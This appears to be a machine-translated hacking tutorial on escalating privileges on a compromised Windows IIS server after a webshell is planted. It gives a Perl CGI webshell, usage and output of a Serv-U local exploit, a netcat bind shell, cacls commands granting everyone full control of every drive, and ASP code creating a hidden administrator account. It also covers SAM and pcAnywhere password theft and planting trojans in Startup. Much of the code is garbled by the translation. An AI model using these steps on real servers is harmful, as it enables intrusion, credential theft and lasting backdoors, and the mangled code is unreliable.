This article combines many masters to improve privileges and some ideas when we get a webhell, the next thing is to improve the permissions individual summary: 1: c: / documents and settings / all users / Application Data / Symantec / pcanywhere // Can you jump to this directory, if it is the best, directly under its CIF file, get a pcanywhere password, login 2.c: / winnt / system32 / config // Enhance it Its SAM uses the software that crack SAM passwords with LC4, Saminside3.c: / documents and settings / all users / "Start" menu / program // See here can jump, we can get a lot of useful information from here You can see a lot of shortcuts, we generally choose Serv-U, then view the properties locally, after you know if you can jump in, if you have permission to modify servudaemon.ini, add a user, password is empty [user = Wekwen | 1] Password = homedir = c: // timeout = 600maintence = systemaccess1 = c: / | rwamelcdpaccess1 = f: / | rwamelcdpskeyvalues = This user has the highest permission, then we can ftp to Quote Site Exec XXX to improve the permissions 4.c: / winnt / system32 / inetsrv / data // is this directory, the same is ERVERYOE complete control, what we have to do is uploaded the tools of the promotion rights, and then execute 5. Can you jump? Go to the following directory C: / PHP, use phpspyc: / prel, sometimes not necessarily this directory (same can be learned by downloading the property) with CGI WebShell #! / Usr / bin / perlbinmode (stdout); syswrite (Stdout, "Content-Type: Text / HTML / R / N / R / N", 27); $ _ = $ env {query_string}; s /% 20 / / g; s /% 2fig; $ exECTHIS = $ _; syswrite (stdout, "
/ r / n", 13); Open (stderr, "> & stdout") || DIE "Can't Redire CT stderr "; System ($ exECTHIS); syswrite (stdout," / r / n / r / n ", 17); close (stderr); close (stdout); exit; saved as CGI execution, if not, try the PL extension, change the CGI file to the PL file, submit http: //anyhost/ -cmd.pl? DIR Display "Deny Access", indicating that it can be executed! Submit right now: first upload a Su.exe (SER-U upgrade authority) to the Prel's bin directory http: //anyhost/cmd.pl? C / perl / bin / su.exe return: Serv-u> 3.x local expedition by xiaolu usage: serv-u.exe "Command" Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"It is now IUSR permissions, submitted: http://anyhost/ -cmd.pl? C / perl / bin / su.exe "Cacls.exe C: / E / T / G Everyone: f" http: // Anyhost // CMD.PL? Cerl/bin/su.exe "Cacls.exe D: / E / T / G Everyone: f" http://aNyhost//cmd.pl? c / perl / bin / su.exe " Cacls.exe E: / E / T / G Everyone: f "http: //anyhost/ -cmd.pl? c / perl / bin / su.exe" Cacls.exe f: / e / t / g everyone: f "If you return the following information, it means successful serv-u> 3.x local Exploit by xiaolu <220 Serv-U FTP Server V5.2 for Winsock Ready ...> User Localadministrator <331 User Name Okay, Need Password. *********************************************************** ****> Pass #l@l @ p <230 user logged in, proceed. ******************************* *****************************> Site maintenance ************************* ********************************************* [ ] CREATING New Domain ... <200-DomainID 2 2 <220 Domain settings saved ************************************************************* *********** [ ] Domain XL: 2 Created [ ] Creating Evil User <200-user = XL 200 User Settings Saved *************** ************************************** [ ] now expeditioning .. Sign In User XL <331 User Name Okay, Need Password. ************************************************ ****************> Pass 111111 <230 user logged in, proceed. ********************* ******************************** [ ] now Executing: Cacls.exe C: / E / T / G Everyone : F <220 Domain Deleted All partitions For Everyone fully control Now we upgrade your users to administrators: http://anyhost/ -cmd.pl? C / perl / bin / su.exe "net localgroup administrators IUSR_Anyhost / add "6. can successfully run" cscript C: /Inetpub/AdminScripts/adsutil.vbs get w3svc / inprocessisapiapps "to elevate privileges to use this cscript C: /Inetpub/AdminScripts/adsutil.vbs get w3svc / inprocessisapiapps privileged view dll file :
IDQ.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll Add ASP.DLL to the privilege of the privilege group asp.dll is placed in c: /winnt/system32/inetsrv/asp.dll (the location of different machine is not necessarily Same) We now add CScript Adsutil.vbs SET / W3SVC / INPROCESSISAPIAPPS "C: /Winnt/System32/IDQ.dll" "C: /Winnt/System32/inetsrv/httpext.dll" "C: / Winnt / System32 / InetSRV /httpodbc.dll "" c: /winnt/system32/inetsrv/ssinc.dll "" C: /Winnt/System32/msw3prt.dll "" C: /Winnt/System32/inetsrv/asp.dll "can be used with CScript AdsuTil. VBS Get / W3SVC / INPROCESSISAPIAPPS to see if it is added 7. You can also use this code to trial, as if the effect does not obek <% @ codePage = 936%> <% response.expires = 0 on Error Resume Next session. TimeOut = 50 Server.ScriptTimeout = 3000 set lp = Server.CreateObject ( "WSCRIPT.NETWORK") oz = "WinNT: //" & lp.ComputerName Set ob = GetObject (oz) Set oe = GetObject (oz & "/ Administrators, group ") Set = ob.create (" User "," Wekwen $ ") od.setpassword" wekwen "<---- password od.setinfo set of = getObject (Oz &" / wekwen $, user "OE. Add (ADSPATH) response.write "Wekwen $ Super Account Establishment!"%> Check if this code is checked for success <% @ CodePage = 936%> <% response.expires = 0on error resume next 'Find administrators group Account set tn = server.CreateObject ( "Wscript.Network") Set objGroup = GetObject ( "WinNT: //" & tN.ComputerName & "/ Administrators, group") For Each admin in objGroup.MembersResponse.write admin.Name & "
" Nextif err "No: wscript.network" end if%> 8.c: / program files / java web start // Here you can, generally small, you can try to use JSP's WebShell, I heard that the permissions are small, I No met. 9. Finally, if the host setting is very metamorphosis, you can try the C: / Documents and Settings / All Users / "Start" menu / programs / start "to write BAT, VBS and other Trojans.
